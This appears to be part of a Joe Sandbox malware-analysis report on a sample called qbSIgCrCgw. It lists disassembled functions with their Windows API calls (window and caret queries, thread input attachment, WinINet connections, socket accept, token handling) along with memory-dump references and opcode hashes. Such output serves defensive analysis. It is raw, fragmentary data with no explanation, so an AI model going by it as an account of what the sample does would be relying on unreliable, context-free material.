                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: c95dc45acf15599c7fe3ba78ff73cc6e40902260218da17159e6f230e7745ced
                                                                                • Instruction ID: 3b83f3c362a9d216943c24b0057aff06376b1f290ec6b541a9322cc1e52756a3
                                                                                • Opcode Fuzzy Hash: c95dc45acf15599c7fe3ba78ff73cc6e40902260218da17159e6f230e7745ced
                                                                                • Instruction Fuzzy Hash: A2418DB0E00218DFCB11EF59D884BE97BB5FF44315F1881AAE4299B360D334E985CB48
                                                                                Function 003E4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003E4038
                                                                                • __isleadbyte_l.LIBCMT ref: 003E4066
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003E4094
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003E40CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: dac37b9201e16ef5db33c6a41639669e22cc2658ee364294908cc11382621b3a
                                                                                • Instruction ID: 71e822f199a636cde8a4dd22a5fbfc11410ec189e132fa3fec1fa93329e097d0
                                                                                • Opcode Fuzzy Hash: dac37b9201e16ef5db33c6a41639669e22cc2658ee364294908cc11382621b3a
                                                                                • Instruction Fuzzy Hash: 4031B4315002A5EFDF229F76C844B6ABBA9BF44310F164639E6558B1D1E731DC90D790
                                                                                Function 00417CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00417CB9
                                                                                  • Part of subcall function 003F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 003F5F6F
                                                                                  • Part of subcall function 003F5F55: GetCurrentThreadId.KERNEL32 ref: 003F5F76
                                                                                  • Part of subcall function 003F5F55: AttachThreadInput.USER32(00000000,?,003F781F), ref: 003F5F7D
                                                                                • GetCaretPos.USER32(?), ref: 00417CCA
                                                                                • ClientToScreen.USER32(00000000,?), ref: 00417D03
                                                                                • GetForegroundWindow.USER32 ref: 00417D09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: adbdb5d086e945f845dbeb730a795be3d5b513d0116299d0e2d628cd57f5fdc5
                                                                                • Instruction ID: badce499d7b4f54bf88a2155d9e8084f4821aa17fd514a95812ac833b5c8c99a
                                                                                • Opcode Fuzzy Hash: adbdb5d086e945f845dbeb730a795be3d5b513d0116299d0e2d628cd57f5fdc5
                                                                                • Instruction Fuzzy Hash: 18311E71D00108AFDB01EFA5D845DEFBBF9EF58314B10846AE915E7211DA359E058BA0
                                                                                Function 0041F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • GetCursorPos.USER32(?), ref: 0041F211
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0042E4C0,?,?,?,?,?), ref: 0041F226
                                                                                • GetCursorPos.USER32(?), ref: 0041F270
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0042E4C0,?,?,?), ref: 0041F2A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: bac83fe7ef2d1c6d4ecb91df1d89dc4019b7be120c241a821cf7274680af8510
                                                                                • Instruction ID: 79e461f8e86cc4d9ca2ce0cd1d8b1506771823178f81fc474d7c26d61d2805a8
                                                                                • Opcode Fuzzy Hash: bac83fe7ef2d1c6d4ecb91df1d89dc4019b7be120c241a821cf7274680af8510
                                                                                • Instruction Fuzzy Hash: 19219439501024BFCB168F94D859EEF7BB5FF0A710F0480AAF9098B2A1D3359D92DB54
                                                                                Function 0040431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00404358
                                                                                  • Part of subcall function 004043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00404401
                                                                                  • Part of subcall function 004043E2: InternetCloseHandle.WININET(00000000), ref: 0040449E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: 41d909dd0507cd9e320b823ecf93e470213716a951db40041c5b0fd111039071
                                                                                • Instruction ID: 76d9df581a3efe23f1339a3009f91fef3befd078d994a7b97412e5d4ee0524c4
                                                                                • Opcode Fuzzy Hash: 41d909dd0507cd9e320b823ecf93e470213716a951db40041c5b0fd111039071
                                                                                • Instruction Fuzzy Hash: D321C2B5700601BBEB119F609C01F7BB7A9FF84714F00603BBB15A6690D77598219B98
                                                                                Function 00408A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00408AE0
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00408AF2
                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00408AFF
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408B16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastacceptselect
                                                                                • String ID:
                                                                                • API String ID: 385091864-0
                                                                                • Opcode ID: 6d2ae69e402f83eff4025055fca22ee4335942604c1c9b0fa5e83add828899d1
                                                                                • Instruction ID: a2412779d48b57047c4e37cf75a73e0f5248fcac914b7be7d07b7eb532a9e7d8
                                                                                • Opcode Fuzzy Hash: 6d2ae69e402f83eff4025055fca22ee4335942604c1c9b0fa5e83add828899d1
                                                                                • Instruction Fuzzy Hash: F9216671A001249FC7219F69D985A9EBBFCEF49350F00816AF849EB291DB749D418F94
                                                                                Function 00418A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00418AA6
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00418AC0
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00418ACE
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00418ADC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: d7355dcf274690ec9e0dd8f6fa42c282e03c498c0cc37068b62ac77844516147
                                                                                • Instruction ID: 8efab72d25bf1cc6a1394fc7545971afbd2f97fe0f3129bf2fa5afdd3d0c3c3c
                                                                                • Opcode Fuzzy Hash: d7355dcf274690ec9e0dd8f6fa42c282e03c498c0cc37068b62ac77844516147
                                                                                • Instruction Fuzzy Hash: A611BE31745114AFDB05AB28DC05FFA77ADAF95360F14411AF916CB2E1CB74BC418798
                                                                                Function 003F0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?), ref: 003F1E77
                                                                                  • Part of subcall function 003F1E68: lstrcpyW.KERNEL32(00000000,?,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F1E9D
                                                                                  • Part of subcall function 003F1E68: lstrcmpiW.KERNEL32(00000000,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?), ref: 003F1ECE
                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0AD4
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0AFA
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: c28dda562364e1c53b8e4fb63315dcc38b3ff7548bac11a8617f32c923529742
                                                                                • Instruction ID: d37802fef593edf0468dfaf99740f89f09bebd7e66a8d20fd6c2e44be746a1e1
                                                                                • Opcode Fuzzy Hash: c28dda562364e1c53b8e4fb63315dcc38b3ff7548bac11a8617f32c923529742
                                                                                • Instruction Fuzzy Hash: CB11D336210309AFDB2AAF78DC05E7A77A9FF45314B80412AE906CB291EB71DC50C7A0
                                                                                Function 003E2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 003E2FB5
                                                                                  • Part of subcall function 003D395C: __FF_MSGBANNER.LIBCMT ref: 003D3973
                                                                                  • Part of subcall function 003D395C: __NMSG_WRITE.LIBCMT ref: 003D397A
                                                                                  • Part of subcall function 003D395C: RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 30582793216c7c3ea1cf4a958f800f6793fb8d2637b0ca5244cd9fb91e15dcba
                                                                                • Instruction ID: 88b5b53d5d5ab0c1401efcd9047a2475327dc1312f8c826d348c8f4b2b110725
                                                                                • Opcode Fuzzy Hash: 30582793216c7c3ea1cf4a958f800f6793fb8d2637b0ca5244cd9fb91e15dcba
                                                                                • Instruction Fuzzy Hash: 3B11AB73949261AFDB233B71BC0565A3BA8AF04360F214A26F9499F2D1DB30CD519A94
                                                                                Function 003CEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003CEBB2
                                                                                  • Part of subcall function 003B51AF: _memset.LIBCMT ref: 003B522F
                                                                                  • Part of subcall function 003B51AF: _wcscpy.LIBCMT ref: 003B5283
                                                                                  • Part of subcall function 003B51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B5293
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 003CEC07
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003CEC16
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00423C88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1378193009-0
                                                                                • Opcode ID: e80964d671024185716813675c7cb9a49ab61cdc03814aecfcbaf411e6564111
                                                                                • Instruction ID: 9b0020833744cb598910a2d99974c342c6e82743d4e0336f466c9d4b9b76898f
                                                                                • Opcode Fuzzy Hash: e80964d671024185716813675c7cb9a49ab61cdc03814aecfcbaf411e6564111
                                                                                • Instruction Fuzzy Hash: 7D21D771A047949FE7379B28DC59FE7BBFC9B01308F04049EE69EA6241C3782A848B55
                                                                                Function 003F058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003F05AC
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003F05C7
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003F05DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 003F0632
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                • String ID:
                                                                                • API String ID: 3137044355-0
                                                                                • Opcode ID: 64f7ba60465d32fd7799ab87f7c603df28d02d77bd4083fca1c69294fc4612f6
                                                                                • Instruction ID: f780f80a5771ac8eba73c5fd6e3ea9ead15e4b471a72790516adac6f320310da
                                                                                • Opcode Fuzzy Hash: 64f7ba60465d32fd7799ab87f7c603df28d02d77bd4083fca1c69294fc4612f6
                                                                                • Instruction Fuzzy Hash: D621BE7190020CEFDB268F98EC88EEABBBCEF40300F108469E616D6012D7B0EA54DF50
                                                                                Function 003F6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003F6733
                                                                                • _memset.LIBCMT ref: 003F6754
                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003F67A6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 003F67AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                • String ID:
                                                                                • API String ID: 1157408455-0
                                                                                • Opcode ID: 6b01ff7a7d64c247e7d49ddcec0c8fbf19f7b8b8835bf15d96d426445c68b3d7
                                                                                • Instruction ID: e3016330e97977697f72a837129319b7cd01f8ae3ba29b515c085c64c7ad7169
                                                                                • Opcode Fuzzy Hash: 6b01ff7a7d64c247e7d49ddcec0c8fbf19f7b8b8835bf15d96d426445c68b3d7
                                                                                • Instruction Fuzzy Hash: 33110A72D01228BAE72067A5AC4DFAFBABCEF44724F1041AAF504E71C0D2704E848B68
                                                                                Function 003EB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003EAA79
                                                                                  • Part of subcall function 003EAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003EAA83
                                                                                  • Part of subcall function 003EAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003EAA92
                                                                                  • Part of subcall function 003EAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003EAA99
                                                                                  • Part of subcall function 003EAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003EAAAF
                                                                                • GetLengthSid.ADVAPI32(?,00000000,003EADE4,?,?), ref: 003EB21B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003EB227
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 003EB22E
                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 003EB247
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                • String ID:
                                                                                • API String ID: 4217664535-0
                                                                                • Opcode ID: 8bf7f705b68a1baa3f167abc42848de5fafc744367e7f9c784c1a04b1a077288
                                                                                • Instruction ID: e665b739910d6d90d212f4f2ec00de827b718c408a70749bc13571f99a53ad35
                                                                                • Opcode Fuzzy Hash: 8bf7f705b68a1baa3f167abc42848de5fafc744367e7f9c784c1a04b1a077288
                                                                                • Instruction Fuzzy Hash: 7F110171A00215EFDF069FA5DD80AAFB7B9EF85308F14852DEA4297250D331AE40CB10
                                                                                Function 003EB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 003EB498
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4AA
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4C0
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 32f1f6a0e97d6f13d24043c4869eb263f3cc84e6927a3b3f26d079828af415fe
                                                                                • Instruction ID: 26121b52c8b6da23f7c7a8f95354bd9ae9ed3cf8086e6c7badcc89cc4eb6f72a
                                                                                • Opcode Fuzzy Hash: 32f1f6a0e97d6f13d24043c4869eb263f3cc84e6927a3b3f26d079828af415fe
                                                                                • Instruction Fuzzy Hash: D4111C7A900218FFDB12DF9AC985E9EBBB4FB08710F204191E604B7295D771AE11DB94
                                                                                Function 003CB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003CB5A5
                                                                                • GetClientRect.USER32(?,?), ref: 0042E69A
                                                                                • GetCursorPos.USER32(?), ref: 0042E6A4
                                                                                • ScreenToClient.USER32(?,?), ref: 0042E6AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
